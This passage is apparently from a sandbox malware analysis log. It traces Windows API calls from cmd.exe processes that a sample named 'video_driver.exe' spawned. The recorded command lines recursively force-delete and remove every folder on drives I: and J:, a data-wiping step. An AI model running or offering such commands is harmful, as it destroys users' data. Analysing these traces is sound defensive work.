lpData=0x24ee80*=0x1, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x0, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x40, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x40, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, lpData=0x24ee80*=0x40, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.159] RegCloseKey (hKey=0x68) returned 0x0 [0059.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee74 | out: phkResult=0x24ee74*=0x68) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, lpData=0x24ee80*=0x40, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x1, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.160] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, lpData=0x24ee80*=0x1, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.160] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x0, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.160] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x9, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.160] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x9, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.160] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, lpData=0x24ee80*=0x9, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.160] RegCloseKey (hKey=0x68) returned 0x0 [0059.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b67 [0059.160] srand (_Seed=0x5eb34b67) [0059.160] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" [0059.160] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" [0059.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0059.160] GetProcessHeap () returned 0x430000 [0059.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x4420f8 [0059.160] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x442100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0059.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0059.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0059.161] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0059.161] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0059.161] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0059.161] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0059.161] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0059.161] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0059.161] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0059.161] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0059.161] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0059.161] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0059.161] GetProcessHeap () returned 0x430000 [0059.161] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x442bd0 | out: hHeap=0x430000) returned 1 [0059.161] GetEnvironmentStringsW () returned 0x442310* [0059.161] GetProcessHeap () returned 0x430000 [0059.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae2) returned 0x444c70 [0059.161] FreeEnvironmentStringsW (penv=0x442310) returned 1 [0059.161] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0059.161] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0059.161] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0059.161] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0059.161] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0059.161] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0059.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0059.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0059.162] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0059.162] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0059.162] GetProcessHeap () returned 0x430000 [0059.162] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x4417c8 [0059.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fc40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0059.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24fc40, lpFilePart=0x24fc3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24fc3c*="Desktop") returned 0x25 [0059.162] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0059.162] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f9bc | out: lpFindFileData=0x24f9bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x445760 [0059.162] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0059.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f9bc | out: lpFindFileData=0x24f9bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x445760 [0059.162] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0059.163] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0059.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f9bc | out: lpFindFileData=0x24f9bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x445760 [0059.163] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0059.163] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0059.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0059.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0059.163] GetProcessHeap () returned 0x430000 [0059.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444c70 | out: hHeap=0x430000) returned 1 [0059.163] GetEnvironmentStringsW () returned 0x444180* [0059.163] GetProcessHeap () returned 0x430000 [0059.163] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb36) returned 0x445fa0 [0059.163] FreeEnvironmentStringsW (penv=0x444180) returned 1 [0059.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0059.163] GetProcessHeap () returned 0x430000 [0059.163] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4417c8 | out: hHeap=0x430000) returned 1 [0059.163] GetProcessHeap () returned 0x430000 [0059.163] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400e) returned 0x446ae0 [0059.164] GetProcessHeap () returned 0x430000 [0059.164] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa0) returned 0x442e50 [0059.164] GetProcessHeap () returned 0x430000 [0059.164] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0059.164] GetConsoleOutputCP () returned 0x1b5 [0059.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0059.164] GetUserDefaultLCID () returned 0x409 [0059.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fd80, cchData=128 | out: lpLCData="0") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fd80, cchData=128 | out: lpLCData="0") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fd80, cchData=128 | out: lpLCData="1") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0059.166] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0059.166] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0059.168] GetProcessHeap () returned 0x430000 [0059.168] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x442ef8 [0059.168] GetConsoleTitleW (in: lpConsoleTitle=0x442ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0059.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0059.168] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0059.168] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0059.168] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0059.168] GetProcessHeap () returned 0x430000 [0059.168] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x446ae0 [0059.169] GetProcessHeap () returned 0x430000 [0059.169] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0059.169] GetProcessHeap () returned 0x430000 [0059.169] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x4457e0 [0059.169] GetEnvironmentVariableW (in: lpName="p IN (\"I", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="CD") returned 13 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="ERRORLEVEL") returned 11 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="CMDEXTVERSION") returned 13 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="CMDCMDLINE") returned 13 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="DATE") returned 12 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="TIME") returned -4 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="RANDOM") returned -2 [0059.169] _wcsicmp (_String1="p IN (\"I", _String2="HIGHESTNUMANODENUMBER") returned 8 [0059.169] GetProcessHeap () returned 0x430000 [0059.169] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4457e0 | out: hHeap=0x430000) returned 1 [0059.169] GetProcessHeap () returned 0x430000 [0059.169] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0059.170] GetProcessHeap () returned 0x430000 [0059.170] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0059.170] GetProcessHeap () returned 0x430000 [0059.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0059.170] GetProcessHeap () returned 0x430000 [0059.170] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0059.170] _wcsicmp (_String1="if", _String2=")") returned 64 [0059.170] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0059.170] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0059.170] _wcsicmp (_String1="IF", _String2="if") returned 0 [0059.170] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0059.170] GetProcessHeap () returned 0x430000 [0059.170] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443110 [0059.170] GetProcessHeap () returned 0x430000 [0059.170] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x43ffc0 [0059.171] GetProcessHeap () returned 0x430000 [0059.171] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0059.171] GetProcessHeap () returned 0x430000 [0059.171] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x16) returned 0x441800 [0059.171] GetProcessHeap () returned 0x430000 [0059.171] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x441800) returned 0x16 [0059.171] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443170 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4431d0 [0059.172] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0059.172] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4431f0 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x4457e0 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x14) returned 0x443210 [0059.172] GetProcessHeap () returned 0x430000 [0059.172] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x443210) returned 0x14 [0059.173] _wcsicmp (_String1="del", _String2=")") returned 59 [0059.173] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0059.173] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0059.173] _wcsicmp (_String1="IF", _String2="del") returned 5 [0059.173] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0059.173] _wcsicmp (_String1="REM", _String2="del") returned 14 [0059.173] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0059.173] GetProcessHeap () returned 0x430000 [0059.173] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443230 [0059.173] GetProcessHeap () returned 0x430000 [0059.173] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x10) returned 0x43ffd8 [0059.174] GetProcessHeap () returned 0x430000 [0059.174] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x443290 [0059.174] GetProcessHeap () returned 0x430000 [0059.174] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x4432c0 [0059.175] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0059.175] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0059.175] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0059.175] GetProcessHeap () returned 0x430000 [0059.175] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443320 [0059.175] GetProcessHeap () returned 0x430000 [0059.175] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x443380 [0059.175] GetProcessHeap () returned 0x430000 [0059.175] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4433d0 [0059.175] GetProcessHeap () returned 0x430000 [0059.175] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4433d0, Size=0x12) returned 0x4433d0 [0059.175] GetProcessHeap () returned 0x430000 [0059.175] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4433d0) returned 0x12 [0059.175] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0059.175] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0059.176] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0059.176] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0059.176] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0059.176] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0059.176] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0059.176] GetProcessHeap () returned 0x430000 [0059.176] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4433f0 [0059.177] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0059.177] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0059.177] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0059.177] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0059.177] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0059.177] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0059.177] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0059.177] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0059.177] GetProcessHeap () returned 0x430000 [0059.177] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443410 [0059.177] GetProcessHeap () returned 0x430000 [0059.177] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x443470 [0059.178] GetProcessHeap () returned 0x430000 [0059.178] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0059.179] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0059.180] GetFullPathNameW (in: lpFileName="I:", nBufferLength=0x208, lpBuffer=0x24fa70, lpFilePart=0x24f81c | out: lpBuffer="I:\\", lpFilePart=0x24f81c*=0x0) returned 0x3 [0059.181] wcsncmp (_String1="I:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -19 [0059.185] GetFileAttributesW (lpFileName="I:\\" (normalized: "i:")) returned 0xffffffff [0059.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0059.185] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0059.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0059.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0059.228] _get_osfhandle (_FileHandle=0) returned 0x3 [0059.228] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0059.228] SetConsoleInputExeNameW () returned 0x1 [0059.228] GetConsoleOutputCP () returned 0x1b5 [0059.228] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0059.228] SetThreadUILanguage (LangId=0x0) returned 0x409 [0059.228] exit (_Code=0) Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42ef5000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x9b8 [0062.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3cfadc | out: lpSystemTimeAsFileTime=0x3cfadc*(dwLowDateTime=0x32df600, dwHighDateTime=0x1d62400)) [0062.687] GetCurrentProcessId () returned 0x9a8 [0062.687] GetCurrentThreadId () returned 0x9b8 [0062.687] GetTickCount () returned 0x1147205 [0062.688] QueryPerformanceCounter (in: lpPerformanceCount=0x3cfad4 | out: lpPerformanceCount=0x3cfad4*=18282109428) returned 1 [0062.689] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0062.689] __set_app_type (_Type=0x1) [0062.689] __p__fmode () returned 0x770331f4 [0062.690] __p__commode () returned 0x770331fc [0062.690] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0062.690] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0062.769] GetCurrentThreadId () returned 0x9b8 [0062.769] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x60 [0062.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.769] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.769] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.770] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3cfa6c | out: phkResult=0x3cfa6c*=0x0) returned 0x2 [0062.771] VirtualQuery (in: lpAddress=0x3cfaa3, lpBuffer=0x3cfa3c, dwLength=0x1c | out: lpBuffer=0x3cfa3c*(BaseAddress=0x3cf000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.771] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x3cfa3c, dwLength=0x1c | out: lpBuffer=0x3cfa3c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.771] VirtualQuery (in: lpAddress=0x2d1000, lpBuffer=0x3cfa3c, dwLength=0x1c | out: lpBuffer=0x3cfa3c*(BaseAddress=0x2d1000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.771] VirtualQuery (in: lpAddress=0x2d3000, lpBuffer=0x3cfa3c, dwLength=0x1c | out: lpBuffer=0x3cfa3c*(BaseAddress=0x2d3000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.771] VirtualQuery (in: lpAddress=0x3d0000, lpBuffer=0x3cfa3c, dwLength=0x1c | out: lpBuffer=0x3cfa3c*(BaseAddress=0x3d0000, AllocationBase=0x3d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0062.771] GetConsoleOutputCP () returned 0x1b5 